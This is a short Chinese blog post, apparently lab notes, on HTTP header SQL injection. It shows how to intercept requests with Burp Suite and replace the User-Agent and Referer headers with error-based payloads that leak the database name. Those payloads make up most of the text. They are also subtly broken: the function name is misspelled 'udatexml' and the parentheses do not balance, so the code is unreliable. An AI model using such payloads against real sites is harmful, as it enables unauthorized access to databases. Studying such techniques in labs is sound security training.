post 报头注入
1、user-agent 注入:
使用情况:万能密码无法绕过安全验证,用户名无法注入,通过查看源代码分析执行的动作。
bp抓包修改user_agent的数据如下
User-Agent: ' or udatexml(1,concat('#',(select database(),0),'','')#
2、referer 注入:
用bp抓包,修改referer的数据:
Referer:' or udatexml(1,concat('#',(select database()),0),'','')#
本文作者:ugnfc
本文链接:https://www.cnblogs.com/ugnfc/p/18156881
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步